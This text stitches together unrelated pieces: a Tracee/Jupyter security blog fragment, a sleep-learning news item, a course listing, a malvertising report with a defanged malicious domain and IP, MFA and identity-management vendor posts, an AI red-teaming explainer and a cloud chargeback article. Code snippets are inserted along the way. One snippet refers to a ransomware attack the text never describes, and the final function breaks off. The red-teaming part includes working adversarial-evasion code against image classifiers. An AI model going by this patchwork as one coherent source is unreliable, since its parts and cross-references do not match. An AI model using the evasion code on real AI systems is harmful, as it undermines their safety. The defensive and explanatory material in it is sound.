In this attack, Tracee detected two drift events: dropping and execution on the fly of a binary and a Python file. Although a “living off the land” approach — using the existing tools in a target environment — is common, attackers are often looking to bring in and apply their own tools. Tracee was designed to detect these kinds of events. In this case, the attacker downloaded a nano binary to create the file cpt.py and executed this binary along with the cpt.py script. These specific detections aren’t available in the open source Tracee-rules, but are included in Aqua’s Cloud Native Detection and Response (CNDR) solution that allows to detect and prevent attacks in runtime. Read more about CNDR’s detection capabilities and how CNDR stopped a DeamBus botnet attack. Mapping the attack to the MITRE ATT&CK framework Here we map each component of the attack to the corresponding techniques of the MITRE ATT&CK framework: What actions you should take There are a few recommendations you can follow to mitigate these risks and protect your data applications. Jupyter Notebook recommendations - Use token or another authentication method to control access to your data development application. - Ensure that you’re using SSL to protect data in transit. - Limit inbound traffic to the application either by blocking the internet access completely or, if the environment requires internet access, by using network rules or VPN to control inbound traffic. It’s also recommended to limit outbound access. For instance, in the Aqua platform, you can set network rules to limit access to your resources. - Run your applications with a non-privileged user or one with limited privileges. - Make sure you know all the Jupyter notebook users. You can query the users in an Sqlite3 database, which should be found in this path: ‘./root/.local/share/jupyter/nbsignatures.db’. If SSH access to the server is enabled, you can also inspect the SSH authorized keys files to verify that you’re familiar with all the keys and that there are no unknown users or keys. General security recommendations - Back up critical business systems regularly and consistently to avoid data loss. - Apply the least-privilege access principle throughout your environment. - Follow basic cybersecurity hygiene, which is fundamental to avoiding security gaps that employees might accidentally leave — for example, missing patches and default passwords. - Make sure your IT and security staff are staying vigilant and keeping watch, and that they’re prepared to work diligently to protect customers, processes, and systems. Recommendations for cloud native environments - Identify exposures, vulnerabilities, and misconfigurations that can provide entry points for attackers to gain access and compromise networks. - Scan all your running workloads for critical vulnerabilities with known exploits to conduct focused patching and mitigation. You can use trusted open source scanners such as Trivy. - Scan for vulnerabilities in CI/CD pipelines to ensure that no new vulnerabilities are introduced. - Scan your workloads for suspicious and malicious behavior in runtime with open source tools such as Tracee.
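As a concrete illustration of the first Jupyter recommendation above – requiring authentication and limiting network exposure – here is a minimal, hypothetical jupyter_notebook_config.py sketch (option names are for the classic notebook server; newer releases use the equivalent c.ServerApp settings, and the paths and passphrase are placeholders):

```python
# jupyter_notebook_config.py -- a minimal hardening sketch; adjust to your environment
from notebook.auth import passwd  # use jupyter_server.auth.passwd on newer releases

c = get_config()  # noqa: F821 (provided by Jupyter at load time)

# Require a login password (only the salted hash is stored, never the plain text).
c.NotebookApp.password = passwd("choose-a-strong-passphrase")  # placeholder

# Bind to localhost only; reach the server via SSH tunneling or a VPN instead of
# exposing it directly to the internet.
c.NotebookApp.ip = "127.0.0.1"
c.NotebookApp.open_browser = False

# Serve over TLS so tokens and cookies are encrypted in transit (placeholder paths).
c.NotebookApp.certfile = "/etc/jupyter/ssl/notebook.crt"
c.NotebookApp.keyfile = "/etc/jupyter/ssl/notebook.key"

# Run as an unprivileged user; refuse to start as root.
c.NotebookApp.allow_root = False
```

Even with these settings in place, regular backups of notebooks and data remain the primary defense against ransomware like the attack described above.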
Sleeping is sometimes considered unproductive time. Could the time spent asleep be used more productively – e.g., for learning a new language? To date, sleep research has focused on the stabilization and consolidation of memories formed during wakefulness. However, learning during sleep has rarely been examined. There is considerable evidence for a recapitulation, by replay in the sleeping brain, of wake-learned information. The replay during sleep strengthens the still-fragile memory traces and embeds the newly acquired information in the preexisting store of knowledge. If replay during sleep improves the storage of wake-learned information, then the initial processing of new information should also be feasible during sleep, potentially carving out a memory trace that lasts into wakefulness.

This was the research question of Katharina Henke, Marc Züst and Simon Ruch at the University of Bern, Switzerland. These investigators show for the first time that new foreign words and their translations could be associated during a midday nap, with the associations stored into wakefulness. Following waking, participants could reactivate the sleep-formed associations to access word meanings when presented again with the formerly sleep-played foreign words. The hippocampus, a brain structure essential for associative learning during wakefulness, also supported the retrieval of sleep-formed associations. The results of this experiment are published open access in the scientific journal Current Biology.

The research group examined whether a sleeping person is able to form new semantic associations between played foreign words and translation words during the brain cells' active states, the so-called "up-states." When we reach deep sleep stages, our brain cells progressively coordinate their activity. During deep sleep, the brain cells are commonly active for a brief period of time before they jointly enter a state of brief inactivity. The active state is called the up-state and the inactive state the down-state. The two states alternate about every half-second.

Semantic associations between sleep-played words of an artificial language and their German translation words were only encoded and stored if the second word of a pair was repeatedly played (two, three or four times) during an up-state. For example, when a sleeping person heard the word pairs "tofer = key" and "guga = elephant," then after waking, they were able to categorize with better-than-chance accuracy whether the sleep-played foreign words denoted something large ("guga") or small ("tofer").

"It was interesting that language areas of the brain and the hippocampus – the brain's essential memory hub – were activated during the wake retrieval of sleep-learned vocabulary, because these brain structures normally mediate wake learning of new vocabulary," says Marc Züst, co-author of the paper. "These brain structures appear to mediate memory formation independently of the prevailing state of consciousness – unconscious during deep sleep, conscious during wakefulness."

Besides its practical relevance, this new evidence for sleep learning challenges current theories of sleep and theories of memory. The notion of sleep as an encapsulated mental state, in which we are detached from the physical environment, is no longer tenable. "We could disprove the idea that sophisticated learning is impossible during deep sleep," says Simon Ruch, co-author.
The current results underscore a new theoretical notion of the relationship between memory and consciousness that Katharina Henke published in 2010 (Nature Reviews Neuroscience). "To what extent, and with what consequences, deep sleep can be utilized for the acquisition of new information will be a topic of research in upcoming years," says Katharina Henke.

More information: Current Biology (2019). DOI: 10.1016/j.cub.2018.12.038
Katharina Henke. A model for memory systems based on processing modes rather than consciousness, Nature Reviews Neuroscience (2010). DOI: 10.1038/nrn2850
Provided by University of Bern
Creator: University of Pennsylvania
Category: Software > Computer Software > Educational Software
Topic: Health, Psychology
Tag: applications, hypothesis, internal, research, study
Availability: In stock
Price: USD 99.00

Learners discover how to apply research methods to their study of positive psychology. In this course, we study with Dr. Angela Duckworth and Dr. Claire Robertson-Kraft. Through an exploration of their work "True Grit" and interviews with researchers and practitioners, you develop a research hypothesis and learn to understand the difference between internal and external validity. You also begin to understand and apply the strengths and weaknesses associated with different types of measurements and evaluation designs, and then interpret the results of an empirical study.

Suggested prerequisites: Positive Psychology: Martin E. P. Seligman's Visionary Science and Positive Psychology: Applications and Interventions.
In the sprawling extent of the internet, Google Ads has become a beacon for businesses looking for a digital presence. Its ability to connect products and services with prospective customers is unrivaled. However, the exact mechanisms intended to foster commercial success have been hijacked by threat actors. These attackers use Google Ads to conduct malvertising and phishing campaigns, skillfully concealing risks behind seemingly genuine ads. This hidden underworld of digital advertising endangers unknowing individuals while jeopardizing internet platforms' integrity. As we work through the complexities of these deceptive activities, it's critical to grasp the implications for both individual security and the larger internet ecosystem.

What is Malvertising?

Malvertising, short for "malicious advertising," is the practice of injecting malware into digital advertisements. Cybercriminals can disguise their malware as legitimate commercials using platforms such as Google Ads, thanks to its broad reach and sophisticated targeting capabilities. These advertisements appear on trustworthy websites without the knowledge of the site owner or the advertising network. When users click on these advertisements, they are unknowingly exposed to malware, which can result in data theft, ransomware, and other cyber risks.

Malvertising with Google Ads works by having a threat actor create an advertisement that appears benign on the surface. This advertisement, however, carries malicious code or malware-laced files, PDFs, or APKs. Once accepted, the ad is displayed throughout Google's extensive advertising network, including websites, videos, and apps that millions of people trust and use daily, leading to privacy invasion, potential identity theft, and the compromise of personal devices and personally identifiable information (PII).

The researchers at Bolster found a pattern on the CheckPhish platform, where multiple brands were targeted by misusing Google Ads to make users click on the attacker's website or link instead of the legitimate one.

How it Works

Cybercriminals take advantage of Google's advertising network by purchasing advertisement space for frequently searched keywords and related misspellings. (It is common for consumers to run a search engine query for a desired website without typing the full URL.) Users frequently click on the first link displayed in the search results, regardless of whether it is an advertisement or an organic ranking.

- Keyword Hijacking: Advertisers buy advertising for popular keywords and common misspellings to target visitors looking for legitimate services or products (a simple way to flag such lookalike domains is sketched after this list).
- Ad Content Mimicry: Malicious ads closely resemble genuine ads' graphic and content styles, deceiving consumers into believing they are clicking on a trustworthy link.
- Malicious Landing Pages: When users click on the ad, they are directed to landing pages that may include malware, collect personal information, or deceive them into fraudulent transactions.
- Use of Redirects: To avoid detection, these campaigns frequently use several redirections, taking the user through several domains before arriving at the ultimate malicious website.
- Exploiting Trust in Google's Platform: By utilizing the credibility associated with Google Ads, attackers gain a sense of legitimacy, increasing the effectiveness of their malvertising efforts.
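Since many of these campaigns hinge on lookalike spellings of well-known brands (as in the amazan[.]com example below), a simple first-pass defense is to flag ad or referrer domains that sit within a small edit distance of the brands you care about. The sketch below is illustrative only; the watchlist and threshold are placeholder values, not Bolster's detection logic:

```python
def edit_distance(a: str, b: str) -> int:
    """Classic Levenshtein distance via dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        cur = [i]
        for j, cb in enumerate(b, start=1):
            cur.append(min(prev[j] + 1,                   # deletion
                           cur[j - 1] + 1,                # insertion
                           prev[j - 1] + (ca != cb)))     # substitution
        prev = cur
    return prev[-1]

BRANDS = ["amazon.com", "adidas.com", "notion.so", "weebly.com"]  # example watchlist

def is_suspicious(domain: str, max_distance: int = 2) -> bool:
    """Flag domains that are close to, but not exactly, a protected brand."""
    return any(
        0 < edit_distance(domain.lower(), brand) <= max_distance
        for brand in BRANDS
    )

print(is_suspicious("amazan.com"))   # True  - one substitution away from amazon.com
print(is_suspicious("amazon.com"))   # False - exact match is the legitimate site
print(is_suspicious("example.com"))  # False
```

Production systems combine this kind of lexical check with visual, content, and infrastructure signals, but even a crude filter like this catches the most common typosquats.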
An example of amazan[.]com is demonstrated below; it leads to downloading and installing a "fastblock" application with a serving IP of 178[.]128[.]246[.]195. Numerous brands, including but not limited to Amazon, Adidas, Notion, and Weebly, have been targeted in malvertising campaigns aimed at deceiving unwary consumers. An example comparison of how Adidas has been impacted is shown below.

As noted here, "A growing body of evidence from industry, MITRE, and government experimentation confirms that collecting and filtering data based on knowledge of adversary tactics, techniques, and procedures (TTPs) is an effective method for detecting malicious activity." Said differently, understanding the tactics and techniques is critical for creating strong security measures and preventing potential threats. The relevant MITRE TTPs are given below:

| ID | Tactic | Technique | Procedure |
| --- | --- | --- | --- |
| T1583.008 | Resource Development | Acquire Infrastructure: Malvertising | Spoofed adverts might mislead users into clicking on them, which may subsequently redirect them to a malicious domain that is a clone of legitimate ones carrying trojanized versions of the advertised software. |
| T1189 | Initial Access | Drive-by Compromise | |
| T1608.004 | Resource Development | Stage Capabilities: Drive-by Target | Adversaries may set up an operating environment to infect systems that visit a website during routine browsing. Endpoint systems may be hacked by surfing to adversary-controlled websites. |

Impact & Mitigation

| Impact | Mitigation |
| --- | --- |
| Malvertising through Google Ads can increase the frequency of security breaches, exposing sensitive user and corporate data to unauthorized access. | Report fake ads on the following websites: Facebook: Support Page; Instagram: Support Page; Google: Support Page |
| Loss of trust and reputation, financial loss. | Use ad-blocking software to keep fraudulent advertisements from being displayed. |

Though advantageous, the swift shift to digital platforms presents numerous opportunities for cybercriminals skilled in exploiting weaknesses for malicious advertising operations. These deceptive efforts provide an outlet for the stealthy collection of sensitive information, posing significant hazards to individuals and businesses. Malvertising is a more subtle threat, collecting and distributing personal and financial information without detection and frequently overcoming traditional security measures. Proactive investigation and vigilant monitoring are critical for detecting and limiting the efforts of individuals behind malvertising campaigns, especially as new methods of attack arise. Our analysis emphasizes the significance of maintaining ongoing monitoring and developing forward-thinking measures to combat these dangers.

Bolster's anti-phishing and domain monitoring technology protects your business from evolving phishing threats. With continuous scanning technology that quickly identifies threats and misuse of your branded assets, you can trust Bolster to protect your business. See Bolster in action when you request a demo.
Multi-Factor Authentication, similar to Two-Factor Authentication, is a way to further protect you, your business, and your employees from the threats of cybercrime. With the ever-rising rate of hacking and data breaches, it's more crucial than ever to safeguard your sensitive information. It's no longer enough to just have a strong password. This is where MFA comes into play. Let's break it down:

What is Multi-Factor Authentication?

MFA is a second layer of security that you can use for your email logins, device logins, and many other places where you store sensitive information. It's usually broken down into three concepts:

- Things you know (knowledge), such as a password or PIN
- Things you have (possession), such as a badge or smartphone
- Things you are (inherence), indicated through biometrics, like fingerprints or voice recognition¹

Combinations of the three concepts above work to create a more personalized layer of security for your devices. You may have seen these in use when you forget your email password and Google or Yahoo sends you an authentication code via text to your phone, or, if you have a newer iPhone, when biometrics like facial recognition are used to make sure it's really you, and not just someone who has your passcode.

The examples above help you in your personal life, but what about your work life? Often it's not only your personal information at risk when you or your whole business gets hacked. All of your coworkers and your clients are affected as well. Too many times we see breaches that could have been prevented if something as simple as multi-factor authentication had been implemented. The main idea of multi-factor authentication is to force hackers or bad actors to work harder to gain access to your data in the event that they get your password through breaches of other companies like Yahoo! or Google. When they try to log into your account, they will be forced to prove who they are through multi-factor authentication, and they won't have that additional access to your device to log in.

How Do I Use It?

MFA is simple to use. There are multiple options to choose from, such as text verification, phone calls, and the Microsoft Authenticator app. Based on your settings, when you log into an Office 365 application you'll be asked to enter a 6-digit code to verify your login. Here is a document explaining the setup process. After you enable MFA you may be prompted to log in and authenticate some of your accounts again. Most Microsoft products fall under this requirement, including your desktop Outlook, OneDrive for Business, Teams, SharePoint, and the Office 365 Portal (for OWA or any other Office 365 features).

How Do I Get MFA?

Is the fear of a data breach on your mind lately? The good news is that if you have Office 365, you likely already have access to Multi-Factor Authentication. If you're interested in MFA, call us at (201) 796-0404 and we'd be happy to set it up for you.

Information Technology Aligned With Your Business Goals? Baroan is a complete IT services & IT support company working with organizations in Elmwood Park and across the United States of America.
When it comes to IT services and solutions, you need someone who not only comprehends the IT industry but is also passionate about helping clients achieve long-term growth using proven IT solutions. Guy, in leading our company, is committed to helping clients improve their technology in order to develop a competitive edge in their industries. At Baroan Technologies, Guy Baroan leads a team of dedicated professionals who are committed to delivering exceptional IT services and solutions. With his extensive expertise and hands-on experience, Guy ensures that clients receive the utmost support and guidance in their IT endeavors. Trust in Baroan Technologies to elevate your business systems and stay ahead in today’s competitive landscape.
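As background to the six-digit verification codes mentioned above: authenticator apps typically generate them as time-based one-time passwords (TOTP, in the style of RFC 6238). The sketch below shows the general mechanism only; it is not Microsoft Authenticator's implementation, and the base32 secret is a made-up example value.

```python
# Minimal TOTP (time-based one-time password) sketch, RFC 6238 style.
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, period: int = 30, digits: int = 6, now=None) -> str:
    """Generate a 6-digit time-based one-time password from a shared secret."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int((now if now is not None else time.time()) // period)
    msg = struct.pack(">Q", counter)                       # 8-byte big-endian counter
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                             # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

if __name__ == "__main__":
    demo_secret = "JBSWY3DPEHPK3PXP"   # example secret only, base32-encoded
    print("Current code:", totp(demo_secret))
```

Both the server and the authenticator app hold the same secret, so each side can compute the same short-lived code independently; an attacker who only has the password still cannot produce it.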
Cybersecurity has come a long way in the past two decades. So much so that proper identity management practices have become a basis for strong cybersecurity systems. In short, you always have to make sure that everyone is who they claim to be when requesting access. Equally as important, you should be certain that they are allowed to access what they're requesting. With this in mind, choosing a specific identity management approach can be challenging, especially when dealing with enterprise identity management solutions. So, to help you make sure you pick the most suitable identity management policy, we'll cover everything you need to know about this extensive topic, all in one place.

What is Identity Management?

Identity management (IdM), also known as identity and access management (IAM), is often defined as a system used by IT departments to initiate, store, and manage user identities and access permissions. IAM includes two important processes: authentication and authorization. In simple terms, authentication answers who you are by matching your login and password with your record in a database. Authorization checks what access and permissions you have. So, the identity and access management system is there to prevent any unauthorized access and raise alarms whenever an unauthorized user or program makes an access attempt.

Additionally, it's important to differentiate Identity Management and Access Management. The easiest way to do so is to remember that Identity Management is all about managing different attributes related to a user, a group of users, or any other entity that requires access. On the other hand, Access Management is about evaluating these attributes and giving a positive or negative access decision based on them.

The IAM methodology ensures that users have access to the assets they need, such as systems, infrastructure, software, and information, while keeping those assets inaccessible to unauthorized users. The key to secure identity management and access control lies in the combination of strong credentials, appropriate permissions, specified assets, and the right context. Identity and access management policies and procedures are developed with one principal idea in mind: preventing the exposure of sensitive data.

Identity and Access Management Concepts

Identity and access management solutions, like the Hideez Authentication Service, typically consist of the following fundamental elements:

- an identity repository with personal data used by the system to identify users;
- access lifecycle management tools (used to add, modify, update, or delete that data);
- an access regulation system that enforces security policies and access privileges;
- a report and audit system that monitors activity in the overall system.

Identity access management tools can include automatic provisioning software, password managers, security-policy enforcement applications, monitoring apps, multi-factor authentication, single sign-on, and more. With the advancement of technologies and an increased number of data breaches, it takes more than a strong login and password to protect an account. That's why more and more IAM solutions use biometrics, physical tokens, machine learning, and artificial intelligence in their systems.

Identity Management Use Cases

User identity management

User identities are managed by the IAM solution. The IAM may integrate with existing directories' identity management roles, synchronize with them, or be the one source of truth.
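Before continuing with the use cases, here is a minimal sketch of the authentication and authorization split described above, with a simple role-based permission check. The users, roles, and permissions are invented for illustration; this is not the Hideez API, and a real system would use a proper password-hashing KDF and per-user salts rather than a plain SHA-256.

```python
# Toy IAM check: authentication answers "who are you?", authorization answers
# "what are you allowed to do?". All data below is made up for illustration.
import hashlib

USERS = {  # identity repository: username -> (salted password hash, roles)
    "alice": (hashlib.sha256(b"salt|s3cret").hexdigest(), ["editor"]),
    "bob":   (hashlib.sha256(b"salt|hunter2").hexdigest(), ["viewer"]),
}

ROLE_PERMISSIONS = {          # role-based access control (RBAC) table
    "viewer": {"report:read"},
    "editor": {"report:read", "report:write"},
    "admin":  {"report:read", "report:write", "user:manage"},
}

def authenticate(username: str, password: str) -> bool:
    """Match the presented credential against the identity repository."""
    record = USERS.get(username)
    if record is None:
        return False
    return hashlib.sha256(f"salt|{password}".encode()).hexdigest() == record[0]

def authorize(username: str, permission: str) -> bool:
    """Grant or deny based on the roles assigned to the user."""
    _, roles = USERS.get(username, (None, []))
    return any(permission in ROLE_PERMISSIONS.get(role, set()) for role in roles)

if __name__ == "__main__":
    assert authenticate("alice", "s3cret")        # who you are
    assert authorize("alice", "report:write")     # what you may do
    assert not authorize("bob", "report:write")   # denied by role
    print("IAM checks passed")
```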
In any case, an id management system is used to create, modify, and delete users. User provisioning and de-provisioning An IT department is responsible for user provisioning. They need to enter new users into the system and specify what apps, software, sites, directories, and other resources they can access. It is essential to define what level of access (administrator, editor, viewer) every individual user has to each of them. To simplify the process, the IT department can use role-based access control (RBAC). This way, when a user is assigned one or more roles, he or she automatically gets access as defined by that role. De-provisioning is also a critical IAM component. When done manually, it can result in delayed action and unintended disclosure. Hideez Enterprise server automates the process and immediately de-provision ex-employees. IAM systems authenticate a user when the user requests access. A common standard is to use multi-factor authentication to ensure stronger protection and a better ID management system overall. Based on user provisioning, an IAM system authorizes user access to the requested resource if the credentials match the records in the database. To help companies comply with regulations, identify security risks, and improve internal processes, IAM provides reports and dashboards to monitor the situation. Single Sign-On (SSO) SSO is one of the best examples of modern and sophisticated identity management use cases. Only the best IAM systems like Hideez include SSO in their solution. SSO is an extra level of security that makes access for the end-user much faster, as it allows the user to use multiple resources without an additional login. Benefits of Identity and Access Management Enterprise identity management solutions bring about a long list of proven advantages. By implementing an access control and identity management solution, a company can gain the following identity management benefits: - More Robust Security - Proper identity management gives companies greater control of user access and reduces the risk of a data breach. IAM systems can reliably authenticate and authorize users based on their access credentials and access levels in their directory profiles. - Quick and Easy Access - Access is provided based on a single interpretation of the existing policy. This allows for easy access no matter where you’re trying to access from. This is a huge game-changer, as it eliminates the user’s physical location as any factor. - Stronger and More Streamlined Internal Systems - IAM also strengthens internal policy compliance and reduces financial, labor, and time resources needed for this end. - Increased Productivity - Automated IAM systems boost employee productivity by decreasing the effort, time, and money required to manage the IAM tasks manually. Simultaneously, this streamlined enterprise identity access management system saves on IT costs, as internal help desks won’t be as busy as before. - Simplified Reporting and Auditing Processes - IAM assists companies in compliance with governmental regulations, as they incorporate the necessary measures and provide on-demand reports for the audit. Identity Management for Stronger Compliance As more attention and media exposure is given to the issue of data privacy, the government and regulatory bodies introduced multiple acts and regulations to protect client and business data. 
Here are the most important ones that hold companies accountable for controlling access to sensitive user information:

- PCI DSS: The Payment Card Industry Data Security Standard is a widely accepted standard for credit card companies. In the context of identity management and access management, PCI DSS can help enterprises regulate this vital financial sector.
- PSD2: The PSD2 is a payment directive that brings significant innovations to the online banking world, primarily in the form of stronger and better authentication.
- HIPAA: This is a significant identity management policy, as it established nationwide rules and standards for processing electronic healthcare transactions.
- GDPR: The General Data Protection Regulation has been in effect since 2018 and is currently one of the primary pieces of legislation aiming to consolidate data protection across all EU member states.
- CCPA: The California Consumer Privacy Act is the first significant privacy law in the US that focuses on consumer control of personal data.
- Sarbanes-Oxley: The SOX identity and access management security standard applies to publicly traded companies, including those in the banking, financial services, and insurance industries.
- Gramm-Leach-Bliley: Also known as GLBA, this is a federal law that mandates that all financial institutions must maintain the confidentiality of non-public customer data. Moreover, it requires institutions to protect against threats to this information.

Identity management systems can significantly reduce the risk of breaching those regulations. Given the cost of negative audit results for the business, compliance should be a top priority for every IT department in companies subject to the aforementioned regulations.

Enterprise Identity Management Solutions by Hideez

Choosing the right identity management products can make a world of difference in both usability and security. At Hideez Group, we've rolled out a new version of our acclaimed Enterprise Server. It enables passwordless access with various types of FIDO authenticators. The main components of the Hideez Authentication Service are:

- Hideez Enterprise Server: A FIDO/WebAuthn server and SAML 2.0 Identity Provider. It's a very capable server that delivers passwordless FIDO2 authentication and FIDO U2F across corporate applications and websites.
- Hideez Client Software: A streamlined application that confirms authorization and connection, and enables hotkeys for entering credentials.
- Hideez Authenticator: A mobile application that provides fast and secure access to corporate apps and web services with mobile identification. Employees can use biometric verification or scan a unique QR code to sign in to their accounts.
- Hideez Security Keys or other hardware/software authenticators: You can use your own authentication tools depending on your needs. We recommend using multifunctional security keys, the Hideez Key 3 or the Hideez Key 4, to ensure the maximum convenience and security of all end users, but you can do without them.

The Hideez enterprise identity management solution brings a long list of benefits. It's an all-in-one solution that enables straightforward password control without the need to disclose any credentials. It prevents phishing attacks and minimizes the risk of human error, in return ensuring better business continuity without any disruptions. If you're looking for reliable IAM enterprise solutions and want to go truly passwordless, get access to the Hideez Server demo version absolutely free by contacting us right away!
What is "AI red-teaming"? Defining a process into the recently discussed practice of AI red-teaming As many are now aware, the White House released its “Executive Order on the Safe, Secure, and Trustworthy Development and Use of Artificial Intelligence” this week. The goal of this Executive Order (EO) is to encourage the development and use of AI safely and responsibly and ultimately that “artificial Intelligence must be safe and secure”. Over the next few weeks and months, the White House, the National Institutes of Standards and Technology (NIST), the Department of Homeland Security (DHS), and other government institutions will be working diligently to further the guidance and directives laid out in the EO. In the meantime, there are several items in the EO that can be more clearly defined for the public. The goal of this article is to examine the term and practice of “AI red-teaming” mentioned throughout and defined in the EO as “a structured testing effort to find flaws and vulnerabilities in an AI system, often in a controlled environment and collaboration with developers of AI” in section 3(d). The EO definition continues to explain that “artificial Intelligence red-teaming is most often performed by dedicated ‘red teams’ that adopt adversarial methods to identify flaws and vulnerabilities, such as harmful or discriminatory outputs from an AI system, unforeseen or undesirable system behaviors, limitations, or potential risks associated with the misuse of the system.” What is AI red-teaming? The concept of red-teaming in general is not new. Cybersecurity professionals have been using red-teaming for the last two decades as part of their standard practices for understanding vulnerabilities in an organization’s cyber infrastructure. These traditional cyber red teams typically have the following attributes : - Security professionals who act as adversaries to overcome cyber security controls - Utilize all the available techniques to find weaknesses in people, processes, and technology to gain unauthorized access to assets - Make recommendations and plans on how to strengthen an organization’s security posture In a complementary role to traditional cyber red teams, AI red teams have the following attributes: - AI security professionals with varying backgrounds (including traditional cybersecurity professionals, AI practitioners, adversarial ML experts, etc.) who act as adversaries to discover vulnerabilities in AI-enabled systems - Utilize all the available techniques to find weaknesses in people, processes, and technology to gain unauthorized access to AI-enabled systems - Make recommendations and plans on how to strengthen an organization’s AI security posture While the attributes of both approaches appear similar, AI poses unique security vulnerabilities not covered by traditional cybersecurity, such as data poisoning, membership inference, and model evasion . Therefore, the mission and execution of the AI red-teaming approach are also unique. We define the AI red-teaming process in a three-phase approach in the following manner. How does AI red-teaming work? In the first phase, the focus of the AI red team is to stand up the team by recruiting the right talent for the red-teaming exercise and utilizing and building the necessary tools that will be needed. Depending on the AI system being red-teamed, the members of the team may include traditional cybersecurity professionals, adversarial machine learning experts, operational and domain experts, and AI practitioners. 
Once the team is stood up and the AI red-teaming mission has been identified, phase two, or the execution phase, of the AI red-teaming process begins. This may be broken up into five main steps: - Analyze the target system to gain as much as possible and as needed to perform the AI red-teaming exercise. This may include building threat models, performing information gathering on the system and mission, and utilizing openly available knowledgebases of known attacks, such as MITRE ATLAS . - Identify and potentially access the target system and AI model or component of the system that will be attacked. In some cases, access to the system will be very difficult, so a “black-box” approach will be needed to carry out the attack, which might involve building a proxy system or model for the target system. - Once the threat model, target system, and AI model have been identified and understood, develop the attack. For example, if the target system is a surveillance system and the threat model is to evade detection from the AI model performing face recognition, the development of the attack will focus on face recognition evasion attacks. - Once one or more attacks have been developed for the AI red team exercise, deploy and launch the attack on the target system. The type of deployment may vary widely depending on the target system and threat model. - Perform impact analysis of the attack. This analysis will include metrics from the individual model performance of the affected AI components but should also include higher-level metrics to understand the effect of the attack on the overall system and/or mission under attack. The final phase of the AI red-teaming process is the knowledge-sharing phase. In this phase, lessons learned and recommendations are shared with the development teams, blue teams, and any stakeholders involved in securing the AI systems of the organization or mission involved in the exercise. Additionally, results from the exercise might be shared with auditors, the broader AI security community, and incidence-sharing mechanisms to further knowledge and understanding of AI security risks to the broader community. How do you get started? Given the relative nascence of AI red-teaming, it may seem daunting to know where to start. Consider the following initial steps to get started with red-teaming against your organization’s high stakes AI systems: - Discover your organization’s AI systems in development, in deployment, and in the supply chain - Identify the use case that carries the most risk in the event of an adversarial security attack, as well as the key stakeholders responsible for maintaining the operations and security of the AI system(s) - Get leadership buy-in by showcasing the potential value-add/risk reduction of the red-teaming activities For more information, connect with me and follow Cranium on Linkedin for the latest in AI red-teaming!
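To make the "develop the attack" step more concrete, here is a minimal sketch of one classic evasion technique, a fast gradient sign method (FGSM) perturbation against an image classifier. The model and input are toy stand-ins chosen purely for illustration; the epsilon value and architecture are arbitrary assumptions, not part of any particular red-team toolkit or target system.

```python
# Minimal FGSM-style evasion sketch (PyTorch). Toy model and data; for
# illustration of the technique only, not a turnkey red-team tool.
import torch
import torch.nn as nn
import torch.nn.functional as F

class TinyClassifier(nn.Module):
    """Stand-in for the target model an AI red team would actually attack."""
    def __init__(self, n_classes: int = 10):
        super().__init__()
        self.net = nn.Sequential(nn.Flatten(), nn.Linear(28 * 28, 64),
                                 nn.ReLU(), nn.Linear(64, n_classes))

    def forward(self, x):
        return self.net(x)

def fgsm_perturb(model: nn.Module, x: torch.Tensor, y: torch.Tensor,
                 eps: float = 0.1) -> torch.Tensor:
    """Return an adversarially perturbed copy of x that tries to flip the prediction."""
    x_adv = x.clone().detach().requires_grad_(True)
    loss = F.cross_entropy(model(x_adv), y)
    loss.backward()
    # Step in the direction that *increases* the loss, clipped to the valid pixel range.
    return (x_adv + eps * x_adv.grad.sign()).clamp(0.0, 1.0).detach()

if __name__ == "__main__":
    torch.manual_seed(0)
    model = TinyClassifier().eval()
    x = torch.rand(1, 1, 28, 28)               # fake "image"
    y = model(x).argmax(dim=1)                 # model's current prediction
    x_adv = fgsm_perturb(model, x, y, eps=0.1)
    print("clean pred:", y.item(),
          "adversarial pred:", model(x_adv).argmax(dim=1).item())
```

In a real exercise the model, threat model, and success metrics would come from the analysis and identification steps above, and the impact-analysis step would measure how often such perturbations change the system-level outcome, not just the individual prediction.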
The what, where, when and how of the cloud are persistent questions that must be answered correctly if a cloud deployment is to be successful. But misconceptions can be handicaps, and organisations often labour under a number of them. A little understanding of cloud architectures, management and chargeback can help in selecting the solution that best fits their needs.

Managing and using different cloud architectures

The cloud has evolved from the convergence of a number of technologies and approaches to computing. The underlying architecture is both similar to and different from existing computing models, and it shapes the operational and technological approaches to network configuration and security practices. Like all computing systems operating over a network, the cloud consists of a back end [the remote server(s)] and a front end (the client computers). The connecting network is the Internet. The servers, the applications and the storage devices at the back end provide a cloud of services to the customers. Cloud computing systems that cater to multiple clients are known as "public" clouds. When an entire cloud service system is dedicated to a single client, it is known as a "private" cloud. Hybrid clouds combine features of the public and private clouds. The client machines connect to the remote server(s) and the applications using software called an "agent". The agent is a special kind of software, known as middleware. It enables IT administrators to monitor traffic, administer the system, and set rules and regulations for access to and use of the information stores available on the remote server.

"Utility computing" is the unique selling point (USP) of the cloud. Organisations signing up for cloud services agree that the cloud makes it easier for the organisation to track and measure IT expenses per business unit. Chargeback becomes simpler as it is metered like electricity, on a "pay per use" basis. Chargeback mechanisms in the cloud take two factors into consideration: What are the resources and metrics for chargeback? How is excess capacity that is supplied on the fly accounted for? The chargeback system is built on the assumption that customers tend to use average capacity rather than large capacity, and hence offering scalable services does not automatically result in extensive usage of resources. Further, cloud vendors understand that successful chargeback systems separate infrastructure costs from service costs, and that shared infrastructure is a combination of fixed and variable costs in which the percentage of fixed costs decreases as the number of users increases. Pricing will consequently be tiered per unit, bundled, or pay per use.
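A tiered, pay-per-use chargeback model of the kind described above can be expressed in a few lines. The tier boundaries, rates, and fixed infrastructure fee below are invented example values, not any vendor's actual price list.

```python
# Tiered "pay per use" chargeback sketch. Tier sizes and rates are examples only.
TIERS = [
    (1000, 0.10),          # first 1,000 units at $0.10 each
    (9000, 0.07),          # next 9,000 units at $0.07 each
    (float("inf"), 0.05),  # everything above 10,000 units at $0.05 each
]

def chargeback(units_used: float, fixed_infrastructure_fee: float = 50.0) -> float:
    """Separate the fixed infrastructure cost from the variable, metered service cost."""
    remaining, variable_cost = units_used, 0.0
    for tier_size, rate in TIERS:
        in_tier = min(remaining, tier_size)
        variable_cost += in_tier * rate
        remaining -= in_tier
        if remaining <= 0:
            break
    return fixed_infrastructure_fee + variable_cost

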